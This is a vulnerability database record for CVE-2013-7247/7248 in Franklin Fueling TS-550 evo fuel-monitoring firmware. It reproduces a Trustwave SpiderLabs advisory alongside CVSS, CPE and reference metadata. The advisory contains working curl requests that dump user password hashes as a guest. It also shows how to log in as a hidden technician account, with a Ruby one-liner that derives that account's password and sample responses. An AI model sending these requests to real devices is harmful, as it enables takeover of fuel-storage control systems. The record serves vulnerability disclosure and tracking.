VAR-201401-0295
Vulnerability from variot - Updated: 2023-12-18 13:29cgi-bin/tsaws.cgi in Franklin Fueling Systems TS-550 evo with firmware 2.0.0.6833 and other versions before 2.4.0 allows remote attackers to discover sensitive information (user names and password hashes) via the cmdWebGetConfiguration action in a TSA_REQUEST. Franklin Fueling Systems are prone to a security bypass vulnerability. Successfully exploiting this issue may allow an attacker to gain access to sensitive configuration information including credentials. This may aid in further attacks. Franklin Fueling Systems 2.0.0.6833 is vulnerable; other versions may also be affected. The system is used to monitor fuel storage and provides an intuitive and easy-to-read interface for alarm functions. Affects prior to version 2.4.0
Product description: A fuel management system with a programmable interface used for inventory and delivery management.
Finding 1: Insufficient Access Control Credit: Nate Drier and Matt Jakubowski of Trustwave SpiderLabs CVE: CVE-2013-7247 CWE: CWE-200
As the Guest user (the lowest privilege), a user can post the cmdWebGetConfiguration parameter to cgi-bin/tsaws.cgi. This will return the usernames and password hashes (in DES format) for all users of the application. Once dumped, they can be cracked and used to access authenticated portions of the application.
Request
curl -H "Content-Type:text/xml" --data '' http://:10001/cgi-bin/tsaws.cgi
Response
Finding 2: Hardcoded Technician Credentials Credit: Nate Drier and Matt Jakubowski of Trustwave SpiderLabs CVE: CVE-2013-7248 CWE: CWE-798
The three primary users on the TS550 are roleGuest, roleUser, and roleAdmin. Another user exists with additional access named roleDiag. This user can access extra portions of the application such as the command line interface, enable and disable SSH, as well as run SQL commands all from the web interface. The CLI interface includes the ability to run engineering and manufacturing commands. The password for roleDiag is the key (a value returned with every POST request to tsaws.cgi) DES encrypted. This can be done in Ruby:
$ irb 1.9.3p374 :001 > "11111111".crypt("aa") => "aaDTlAa1fGGC."
Request
curl -H "Content-Type:text/xml" --data '' http://:10001/cgi-bin/tsaws.cgi
Response (note the ROLE)
The password can then be used to run various roleDiag commands. An attacker can enable SSH, and since root's password is the same as roleAdmin, they can completely compromise the device. However, Trustwave SpiderLabs have not verified this fix.
Revision History: 04/16/13 - Vulnerability disclosed to vendor 12/18/13 - Fix released on a limited basis by vendor 01/03/14 - Advisory published
References 1. http://www.franklinfueling.com/evo/
About Trustwave: Trustwave is the leading provider of on-demand and subscription-based information security and payment card industry compliance management solutions to businesses and government entities throughout the world. For organizations faced with today's challenging data security and compliance environment, Trustwave provides a unique approach with comprehensive solutions that include its flagship TrustKeeper compliance management software and other proprietary security solutions. Trustwave has helped thousands of organizations--ranging from Fortune 500 businesses and large financial institutions to small and medium-sized retailers--manage compliance and secure their network infrastructure, data communications and critical information assets. Trustwave is headquartered in Chicago with offices throughout North America, South America, Europe, Africa, China and Australia. For more information, visit https://www.trustwave.com
About Trustwave's SpiderLabs: SpiderLabs(R) is the advanced security team at Trustwave focused on application security, incident response, penetration testing, physical security and security research. The team has performed over a thousand incident investigations, thousands of penetration tests and hundreds of application security tests globally. In addition, the SpiderLabs Research team provides intelligence through bleeding-edge research and proof of concept tool development to enhance Trustwave's products and services. https://www.trustwave.com/spiderlabs
Disclaimer: The information provided in this advisory is provided "as is" without warranty of any kind. Trustwave disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose. In no event shall Trustwave or its suppliers be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages, even if Trustwave or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply.
This transmission may contain information that is privileged, confidential, and/or exempt from disclosure under applicable law. If you are not the intended recipient, you are hereby notified that any disclosure, copying, distribution, or use of the information contained herein (including any reliance thereon) is strictly prohibited. If you received this transmission in error, please immediately contact the sender and destroy the material in its entirety, whether in electronic or hard copy format
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201401-0295",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "ts-550 evo",
"scope": "eq",
"trust": 1.9,
"vendor": "franklinfueling",
"version": "2.0.0.6833"
},
{
"model": "ts-550 evo",
"scope": "eq",
"trust": 1.6,
"vendor": "franklinfueling",
"version": "2.3.1.7492"
},
{
"model": "ts-550 evo",
"scope": "eq",
"trust": 1.0,
"vendor": "franklinfueling",
"version": null
},
{
"model": "ts-550 evo",
"scope": null,
"trust": 0.8,
"vendor": "franklin fueling",
"version": null
},
{
"model": "ts-550 evo",
"scope": "eq",
"trust": 0.8,
"vendor": "franklin fueling",
"version": "2.0.0.6833"
},
{
"model": "ts-550 evo",
"scope": "lt",
"trust": 0.8,
"vendor": "franklin fueling",
"version": "2.4.0"
},
{
"model": "ts-550 evo",
"scope": "ne",
"trust": 0.3,
"vendor": "franklinfueling",
"version": "2.4.0"
}
],
"sources": [
{
"db": "BID",
"id": "64996"
},
{
"db": "JVNDB",
"id": "JVNDB-2013-005928"
},
{
"db": "NVD",
"id": "CVE-2013-7247"
},
{
"db": "CNNVD",
"id": "CNNVD-201401-415"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:franklinfueling:ts-550_evo_firmware:2.0.0.6833:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:o:franklinfueling:ts-550_evo_firmware:2.3.1.7492:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:franklinfueling:ts-550_evo:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2013-7247"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Nate Drier and Matt Jakubowski of TrustWave SpiderLabs",
"sources": [
{
"db": "BID",
"id": "64996"
},
{
"db": "CNNVD",
"id": "CNNVD-201401-415"
}
],
"trust": 0.9
},
"cve": "CVE-2013-7247",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": false,
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "NVD",
"availabilityImpact": "NONE",
"baseScore": 5.0,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"impactScore": 2.9,
"integrityImpact": "NONE",
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"severity": "MEDIUM",
"trust": 1.0,
"userInteractionRequired": false,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Low",
"accessVector": "Network",
"authentication": "None",
"author": "NVD",
"availabilityImpact": "None",
"baseScore": 5.0,
"confidentialityImpact": "Partial",
"exploitabilityScore": null,
"id": "CVE-2013-7247",
"impactScore": null,
"integrityImpact": "None",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "Medium",
"trust": 0.8,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "VULHUB",
"availabilityImpact": "NONE",
"baseScore": 5.0,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"id": "VHN-67249",
"impactScore": 2.9,
"integrityImpact": "NONE",
"severity": "MEDIUM",
"trust": 0.1,
"vectorString": "AV:N/AC:L/AU:N/C:P/I:N/A:N",
"version": "2.0"
}
],
"cvssV3": [],
"severity": [
{
"author": "NVD",
"id": "CVE-2013-7247",
"trust": 1.8,
"value": "MEDIUM"
},
{
"author": "CNNVD",
"id": "CNNVD-201401-415",
"trust": 0.6,
"value": "MEDIUM"
},
{
"author": "VULHUB",
"id": "VHN-67249",
"trust": 0.1,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-67249"
},
{
"db": "JVNDB",
"id": "JVNDB-2013-005928"
},
{
"db": "NVD",
"id": "CVE-2013-7247"
},
{
"db": "CNNVD",
"id": "CNNVD-201401-415"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "cgi-bin/tsaws.cgi in Franklin Fueling Systems TS-550 evo with firmware 2.0.0.6833 and other versions before 2.4.0 allows remote attackers to discover sensitive information (user names and password hashes) via the cmdWebGetConfiguration action in a TSA_REQUEST. Franklin Fueling Systems are prone to a security bypass vulnerability. \nSuccessfully exploiting this issue may allow an attacker to gain access to sensitive configuration information including credentials. This may aid in further attacks. \nFranklin Fueling Systems 2.0.0.6833 is vulnerable; other versions may also be affected. The system is used to monitor fuel storage and provides an intuitive and easy-to-read interface for alarm functions. Affects prior to version\n2.4.0\n\nProduct description:\nA fuel management system with a programmable interface used for inventory\nand delivery management. \n\nFinding 1: Insufficient Access Control\nCredit: Nate Drier and Matt Jakubowski of Trustwave SpiderLabs\nCVE: CVE-2013-7247\nCWE: CWE-200\n\nAs the Guest user (the lowest privilege), a user can post the\ncmdWebGetConfiguration parameter to cgi-bin/tsaws.cgi. This will return the\nusernames and password hashes (in DES format) for all users of the\napplication. Once dumped, they can be cracked and used to access\nauthenticated portions of the application. \n\n\n#Request\n\ncurl -H \"Content-Type:text/xml\" --data \u0027\u003cTSA_REQUEST_LIST\u003e\u003cTSA_REQUEST COMMAND=\"cmdWebGetConfiguration\"/\u003e\u003c/TSA_REQUEST_LIST\u003e\u0027 http://\u003cip\u003e:10001/cgi-bin/tsaws.cgi\n\n#Response\n\n\u003cTSA_RESPONSE_LIST VERSION=\"2.0.0.6833\" TIME_STAMP=\"2013-02-19T22:09:22Z\" TIME_STAMP_LOCAL=\"2013-02-19T17:09:22\" KEY=\"11111111\" ROLE=\"roleGuest\"\u003e\u003cTSA_RESPONSE COMMAND=\"cmdWebGetConfiguration\"\u003e\u003cCONFIGURATION\u003e\n \u003cDEBUGGING LOGGING_ENABLED=\"false\" LOGGING_PATH=\"/tmp\"/\u003e\n \u003cROLE_LIST\u003e\n \u003cROLE NAME=\"roleAdmin\" PASSWORD=\"YrKMc2T2BuGvQ\"/\u003e\n \u003cROLE NAME=\"roleUser\" PASSWORD=\"2wd2DlEKUPTr2\"/\u003e\n \u003cROLE NAME=\"roleGuest\" PASSWORD=\"YXFCsq2GXFQV2\"/\u003e\n \u003c/ROLE_LIST\u003e\n\u003c/CONFIGURATION\u003e\u003c/TSA_RESPONSE\u003e\u003c/TSA_RESPONSE_LIST\u003e\n\nFinding 2: Hardcoded Technician Credentials\nCredit: Nate Drier and Matt Jakubowski of Trustwave SpiderLabs\nCVE: CVE-2013-7248\nCWE: CWE-798\n\nThe three primary users on the TS550 are roleGuest, roleUser, and\nroleAdmin. Another user exists with additional access named roleDiag. This\nuser can access extra portions of the application such as the command line\ninterface, enable and disable SSH, as well as run SQL commands all from the\nweb interface. The CLI interface includes the ability to run engineering\nand manufacturing commands. The password for roleDiag is the key (a value\nreturned with every POST request to tsaws.cgi) DES encrypted. This can be\ndone in Ruby:\n\n\n$ irb\n1.9.3p374 :001 \u003e \"11111111\".crypt(\"aa\")\n =\u003e \"aaDTlAa1fGGC.\"\n\n#Request\n\ncurl -H \"Content-Type:text/xml\" --data \u0027\u003cTSA_REQUEST_LIST PASSWORD=\"aaDTlAa1fGGC.\"\u003e\u003cTSA_REQUEST COMMAND=\"cmdWebCheckRole\"/\u003e\u003c/TSA_REQUEST_LIST\u003e\u0027 http://\u003cip\u003e:10001/cgi-bin/tsaws.cgi\n\n#Response (note the ROLE)\n\n\u003cTSA_RESPONSE_LIST VERSION=\"2.0.0.6833\" TIME_STAMP=\"2013-03-04T16:53:01Z\" TIME_STAMP_LOCAL=\"2013-03-04T11:53:01\" KEY=\"11111111\" ROLE=\"roleDiag\"\u003e\u003cTSA_RESPONSE COMMAND=\"cmdWebCheckRole\"\u003e\u003c/TSA_RESPONSE\u003e\u003c/TSA_RESPONSE_LIST\u003e\n\nThe password can then be used to run various roleDiag commands. An attacker\ncan enable SSH, and since root\u0027s password is the same as roleAdmin, they\ncan completely compromise the device. However, Trustwave SpiderLabs have not verified this fix. \n\n\nRevision History:\n04/16/13 - Vulnerability disclosed to vendor\n12/18/13 - Fix released on a limited basis by vendor\n01/03/14 - Advisory published\n\nReferences\n1. http://www.franklinfueling.com/evo/\n\n\nAbout Trustwave:\nTrustwave is the leading provider of on-demand and subscription-based\ninformation security and payment card industry compliance management\nsolutions to businesses and government entities throughout the world. For\norganizations faced with today\u0027s challenging data security and compliance\nenvironment, Trustwave provides a unique approach with comprehensive\nsolutions that include its flagship TrustKeeper compliance management\nsoftware and other proprietary security solutions. Trustwave has helped\nthousands of organizations--ranging from Fortune 500 businesses and large\nfinancial institutions to small and medium-sized retailers--manage\ncompliance and secure their network infrastructure, data communications and\ncritical information assets. Trustwave is headquartered in Chicago with\noffices throughout North America, South America, Europe, Africa, China and\nAustralia. For more information, visit https://www.trustwave.com\n\nAbout Trustwave\u0027s SpiderLabs:\nSpiderLabs(R) is the advanced security team at Trustwave focused on\napplication security, incident response, penetration testing, physical\nsecurity and security research. The team has performed over a thousand\nincident investigations, thousands of penetration tests and hundreds of\napplication security tests globally. In addition, the SpiderLabs Research\nteam provides intelligence through bleeding-edge research and proof of\nconcept tool development to enhance Trustwave\u0027s products and services. \nhttps://www.trustwave.com/spiderlabs\n\nDisclaimer:\nThe information provided in this advisory is provided \"as is\" without\nwarranty of any kind. Trustwave disclaims all warranties, either express or\nimplied, including the warranties of merchantability and fitness for a\nparticular purpose. In no event shall Trustwave or its suppliers be liable\nfor any damages whatsoever including direct, indirect, incidental,\nconsequential, loss of business profits or special damages, even if\nTrustwave or its suppliers have been advised of the possibility of such\ndamages. Some states do not allow the exclusion or limitation of liability\nfor consequential or incidental damages so the foregoing limitation may not\napply. \n\n________________________________\n\nThis transmission may contain information that is privileged, confidential, and/or exempt from disclosure under applicable law. If you are not the intended recipient, you are hereby notified that any disclosure, copying, distribution, or use of the information contained herein (including any reliance thereon) is strictly prohibited. If you received this transmission in error, please immediately contact the sender and destroy the material in its entirety, whether in electronic or hard copy format",
"sources": [
{
"db": "NVD",
"id": "CVE-2013-7247"
},
{
"db": "JVNDB",
"id": "JVNDB-2013-005928"
},
{
"db": "BID",
"id": "64996"
},
{
"db": "VULHUB",
"id": "VHN-67249"
},
{
"db": "PACKETSTORM",
"id": "124873"
}
],
"trust": 2.07
},
"exploit_availability": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/exploit_availability#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"reference": "https://www.scap.org.cn/vuln/vhn-67249",
"trust": 0.1,
"type": "unknown"
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-67249"
}
]
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2013-7247",
"trust": 2.9
},
{
"db": "BID",
"id": "64996",
"trust": 1.0
},
{
"db": "JVNDB",
"id": "JVNDB-2013-005928",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-201401-415",
"trust": 0.7
},
{
"db": "SECUNIA",
"id": "56185",
"trust": 0.6
},
{
"db": "SEEBUG",
"id": "SSVID-84525",
"trust": 0.1
},
{
"db": "EXPLOIT-DB",
"id": "31180",
"trust": 0.1
},
{
"db": "VULHUB",
"id": "VHN-67249",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "124873",
"trust": 0.1
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-67249"
},
{
"db": "BID",
"id": "64996"
},
{
"db": "JVNDB",
"id": "JVNDB-2013-005928"
},
{
"db": "PACKETSTORM",
"id": "124873"
},
{
"db": "NVD",
"id": "CVE-2013-7247"
},
{
"db": "CNNVD",
"id": "CNNVD-201401-415"
}
]
},
"id": "VAR-201401-0295",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VULHUB",
"id": "VHN-67249"
}
],
"trust": 0.01
},
"last_update_date": "2023-12-18T13:29:47.350000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "TS-550 evo",
"trust": 0.8,
"url": "http://www.franklinfueling.com/americas/en/ts-550-evo"
},
{
"title": "ts550evo-2327608",
"trust": 0.6,
"url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=47720"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2013-005928"
},
{
"db": "CNNVD",
"id": "CNNVD-201401-415"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-264",
"trust": 1.9
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-67249"
},
{
"db": "JVNDB",
"id": "JVNDB-2013-005928"
},
{
"db": "NVD",
"id": "CVE-2013-7247"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.8,
"url": "https://www.trustwave.com/spiderlabs/advisories/twsl2014-001.txt"
},
{
"trust": 0.8,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2013-7247"
},
{
"trust": 0.8,
"url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2013-7247"
},
{
"trust": 0.6,
"url": "http://secunia.com/advisories/56185"
},
{
"trust": 0.6,
"url": "http://www.securityfocus.com/bid/64996"
},
{
"trust": 0.3,
"url": "http://www.franklinfueling.com/americas/en"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2013-7247"
},
{
"trust": 0.1,
"url": "http://www.franklinfueling.com/evo/"
},
{
"trust": 0.1,
"url": "https://www.trustwave.com/spiderlabs"
},
{
"trust": 0.1,
"url": "http://www.franklinfueling.com/)"
},
{
"trust": 0.1,
"url": "http://\u003cip\u003e:10001/cgi-bin/tsaws.cgi"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2013-7248"
},
{
"trust": 0.1,
"url": "https://www.trustwave.com"
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-67249"
},
{
"db": "BID",
"id": "64996"
},
{
"db": "JVNDB",
"id": "JVNDB-2013-005928"
},
{
"db": "PACKETSTORM",
"id": "124873"
},
{
"db": "NVD",
"id": "CVE-2013-7247"
},
{
"db": "CNNVD",
"id": "CNNVD-201401-415"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "VULHUB",
"id": "VHN-67249"
},
{
"db": "BID",
"id": "64996"
},
{
"db": "JVNDB",
"id": "JVNDB-2013-005928"
},
{
"db": "PACKETSTORM",
"id": "124873"
},
{
"db": "NVD",
"id": "CVE-2013-7247"
},
{
"db": "CNNVD",
"id": "CNNVD-201401-415"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2014-01-26T00:00:00",
"db": "VULHUB",
"id": "VHN-67249"
},
{
"date": "2014-01-03T00:00:00",
"db": "BID",
"id": "64996"
},
{
"date": "2014-01-28T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2013-005928"
},
{
"date": "2014-01-21T23:03:33",
"db": "PACKETSTORM",
"id": "124873"
},
{
"date": "2014-01-26T01:55:09.877000",
"db": "NVD",
"id": "CVE-2013-7247"
},
{
"date": "2014-01-23T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201401-415"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2014-01-27T00:00:00",
"db": "VULHUB",
"id": "VHN-67249"
},
{
"date": "2015-03-19T08:08:00",
"db": "BID",
"id": "64996"
},
{
"date": "2014-01-28T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2013-005928"
},
{
"date": "2014-01-27T15:57:24.630000",
"db": "NVD",
"id": "CVE-2013-7247"
},
{
"date": "2014-01-28T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201401-415"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201401-415"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Franklin Fueling Systems TS-550 evo Of firmware cgi-bin/tsaws.cgi Vulnerability in which important information is obtained",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2013-005928"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "permissions and access control",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201401-415"
}
],
"trust": 0.6
}
}
Sightings
| Author | Source | Type | Date |
|---|
Nomenclature
- Seen: The vulnerability was mentioned, discussed, or observed by the user.
- Confirmed: The vulnerability has been validated from an analyst's perspective.
- Published Proof of Concept: A public proof of concept is available for this vulnerability.
- Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
- Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
- Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
- Not confirmed: The user expressed doubt about the validity of the vulnerability.
- Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.